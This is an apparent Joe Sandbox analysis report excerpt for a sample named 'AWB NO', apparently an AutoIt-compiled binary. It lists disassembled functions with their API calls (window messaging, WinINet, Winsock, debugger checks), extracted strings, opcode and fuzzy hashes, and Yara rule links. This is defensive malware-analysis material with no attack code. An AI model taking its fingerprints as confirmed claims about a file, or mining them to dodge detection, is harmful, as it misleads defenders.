                                                              Function 00486B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowTextLengthW.USER32(00000000), ref: 00486C11
                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00486C20
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: LengthMessageSendTextWindow
                                                              • String ID: edit
                                                              • API String ID: 2978978980-2167791130
                                                              • Opcode ID: 0ee778e15671e51e222ddf6b494b90a822ca39a2f7f3572f5c0e2ac18639bf76
                                                              • Instruction ID: b0ee5d61ad9eb474c31c7c598f165b0da72494184ac180eda5d14d3501cef6af
                                                              • Opcode Fuzzy Hash: 0ee778e15671e51e222ddf6b494b90a822ca39a2f7f3572f5c0e2ac18639bf76
                                                              • Instruction Fuzzy Hash: 3B119D71501118ABEB506E649C41AAF3769EF04378F614B2AF960D72E0C739EC919B68
                                                              Function 004724CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00472520
                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472549
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Internet$OpenOption
                                                              • String ID: <local>
                                                              • API String ID: 942729171-4266983199
                                                              • Opcode ID: b4e2ad384fd7c601628b52258e18064e8563b109b01ba46a19230f2044734790
                                                              • Instruction ID: 671247dd43dff78d3ba65fd013137b1b80bf3ca9b363514825ab6a5c38d559c9
                                                              • Opcode Fuzzy Hash: b4e2ad384fd7c601628b52258e18064e8563b109b01ba46a19230f2044734790
                                                              • Instruction Fuzzy Hash: 0C110270500225BAEB248F618D98EFBFF68FF06355F10C12BF90952240D2B86955DAF9
                                                              Function 004780A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0047830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,004780C8,?,00000000,?,?), ref: 00478322
                                                              • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 004780CB
                                                              • htons.WSOCK32(00000000,?,00000000), ref: 00478108
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidehtonsinet_addr
                                                              • String ID: 255.255.255.255
                                                              • API String ID: 2496851823-2422070025
                                                              • Opcode ID: 30e0495df36a20c180977c2ec85794a7f98e8ed9113f9c4c38ccaeb6fc384225
                                                              • Instruction ID: 53d89c5d81ffa0f8ae8b01e320c1c86537ed70fd6efd8479dd932b7ce01561ea
                                                              • Opcode Fuzzy Hash: 30e0495df36a20c180977c2ec85794a7f98e8ed9113f9c4c38ccaeb6fc384225
                                                              • Instruction Fuzzy Hash: 0F118274640205ABDB10AF64CC4ABEEB364EF04714F10C52FF91597292DA76A815CB59
                                                              Function 004592E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0045B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0045B0E7
                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00459355
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3678867486-1403004172
                                                              • Opcode ID: 6f4cd93d913e3c5be19dfe79b0e7e7825a851971f78288f07431068999ffeaf3
                                                              • Instruction ID: 6620effe564b75a25fa02a736a26139334114495a10e04aac7c18130fab69908
                                                              • Opcode Fuzzy Hash: 6f4cd93d913e3c5be19dfe79b0e7e7825a851971f78288f07431068999ffeaf3
                                                              • Instruction Fuzzy Hash: EF01D671A41214EBCB04EB61CC918FE7369FF09310B10061EFD32672D2DA395C0C8659
                                                              Function 004591DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0045B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0045B0E7
                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 0045924D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3678867486-1403004172
                                                              • Opcode ID: 7418797685cb5eb7240229514a8ad03e97cc1442382248b5ed27e6467273e257
                                                              • Instruction ID: 1bae8beb06e11a3a3c25d4cdb8b0a3748c736b1d327c5f25b64b5c832a8fa69b
                                                              • Opcode Fuzzy Hash: 7418797685cb5eb7240229514a8ad03e97cc1442382248b5ed27e6467273e257
                                                              • Instruction Fuzzy Hash: A901DD71A41104B7CB15E7A1C852DFF7398DF05301F14006FB912772C2DA286E0C9679
                                                              Function 00459264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0045B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0045B0E7
                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 004592D0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3678867486-1403004172
                                                              • Opcode ID: d8bf4fc99b4038beca0b7cf08a42ff1528107cd865fe794af9b7fbffc9c8db00
                                                              • Instruction ID: ec6f3d5737f0e0d30d2369f9c6c2f429bc5a5c658118d26cb771477774c35381
                                                              • Opcode Fuzzy Hash: d8bf4fc99b4038beca0b7cf08a42ff1528107cd865fe794af9b7fbffc9c8db00
                                                              • Instruction Fuzzy Hash: 4501D871A81108B7CB01E6A1C841AEF73589B04301F24056BBD01732C2DA295E0C967A
                                                              Function 00433BAE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00429E4B: EnterCriticalSection.KERNEL32(00000000,?,00429CBC,0000000D), ref: 00429E76
                                                              • DeleteCriticalSection.KERNEL32(sin,004BC010,00000010,00426E34), ref: 00433C0B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$DeleteEnter
                                                              • String ID: @RL$sin
                                                              • API String ID: 228587788-1659946082
                                                              • Opcode ID: cd529d78a4a06ebb5d5aa07f5723ae693f5476aaad218602d846b5944c54fecf
                                                              • Instruction ID: 1743b7e90a82ad84b1fa472523a5f12130bd968684bac072e0bc1fa9e2f1effc
                                                              • Opcode Fuzzy Hash: cd529d78a4a06ebb5d5aa07f5723ae693f5476aaad218602d846b5944c54fecf
                                                              • Instruction Fuzzy Hash: 0801C8315002109BC710EF599846E6DF7A0FF48726F55615FF451DB2E2CB78D5428B0C
                                                              Function 004581BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004581CA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: AutoIt$Error allocating memory.
                                                              • API String ID: 2030045667-4017498283
                                                              • Opcode ID: 8d139ad90297f342f2bef9bb968737a1db775ada7a64e4c9f6af1751cec0def7
                                                              • Instruction ID: 372d5128de35d502a090e5452165ba50a974b5f0ee4ea7530394d89cc60aac93
                                                              • Opcode Fuzzy Hash: 8d139ad90297f342f2bef9bb968737a1db775ada7a64e4c9f6af1751cec0def7
                                                              • Instruction Fuzzy Hash: 1DD0123238536832D21432A56D06BCA6A484B15B5AF50443BBB08755D38DDD598242ED
                                                              Function 0043B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00420B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0043B540,?,?,?,0040100A), ref: 00420B89
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B544
                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B553
                                                              Strings
                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B54E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                              • API String ID: 55579361-631824599
                                                              • Opcode ID: cfdba6c3f5d1c47e0915195a6a61c30b6b4130fea4c9ebe93c9a57294c91e8a4
                                                              • Instruction ID: bbad548b5aabf2add28ed68359945d9081cd17edac9c4c9c4009ad7997521b12
                                                              • Opcode Fuzzy Hash: cfdba6c3f5d1c47e0915195a6a61c30b6b4130fea4c9ebe93c9a57294c91e8a4
                                                              • Instruction Fuzzy Hash: 7EE06DB02003108BD720DF69E5047467BE0EB14748F00C97EE946C6251D7BCE448CBA9
                                                              Function 00441B3E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: LocalTime
                                                              • String ID: %.3d$WIN_XPe
                                                              • API String ID: 481472006-2409531811
                                                              • Opcode ID: c18ac069e1d6eb3ecd6810b2c64f4779c8ba0f418c5f4b219093c25649736dfb
                                                              • Instruction ID: 41f1b97e473b991b9022892c38b55fdedc2d4ba70ca61e7e94cb44e346d53a61
                                                              • Opcode Fuzzy Hash: c18ac069e1d6eb3ecd6810b2c64f4779c8ba0f418c5f4b219093c25649736dfb
                                                              • Instruction Fuzzy Hash: 78D0EC71804158EADA449A9098449F9737CE708301F6005A3B506A2450F23DABD69B2F
                                                              Function 00485BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00485BF5
                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00485C08
                                                                • Part of subcall function 004654E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0046555E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: e7f4bdf397475172de9a563981df35a0547720abd061d190681d3d1820635f26
                                                              • Instruction ID: 2ade09667328b1b94c0535c00af31867d2a18255db6fcb0bb85e87ed9834ab31
                                                              • Opcode Fuzzy Hash: e7f4bdf397475172de9a563981df35a0547720abd061d190681d3d1820635f26
                                                              • Instruction Fuzzy Hash: FFD0C931788311B6E764AB70AC0BFDB6A14AB10B51F100C3AB745AA1D1E9E85805C758
                                                              Function 004348B3 Relevance: 5.1, APIs: 4, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00434948
                                                              • GetLastError.KERNEL32 ref: 00434956
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004349A9
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 004349E4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                              • String ID:
                                                              • API String ID: 1717984340-0
                                                              • Opcode ID: c3d95e4449c5a2586279de6f55f374bd91098e679c64c037c465721c0c8cdb4f
                                                              • Instruction ID: 4447cc959808fafc396d648e9cb5613e52aebdc7a714363173d19eef71f8e10e
                                                              • Opcode Fuzzy Hash: c3d95e4449c5a2586279de6f55f374bd91098e679c64c037c465721c0c8cdb4f
                                                              • Instruction Fuzzy Hash: D74107B0600266AFCB219F39DC44BEF7BA4AF89315F10116BF45597291DB38AC00C769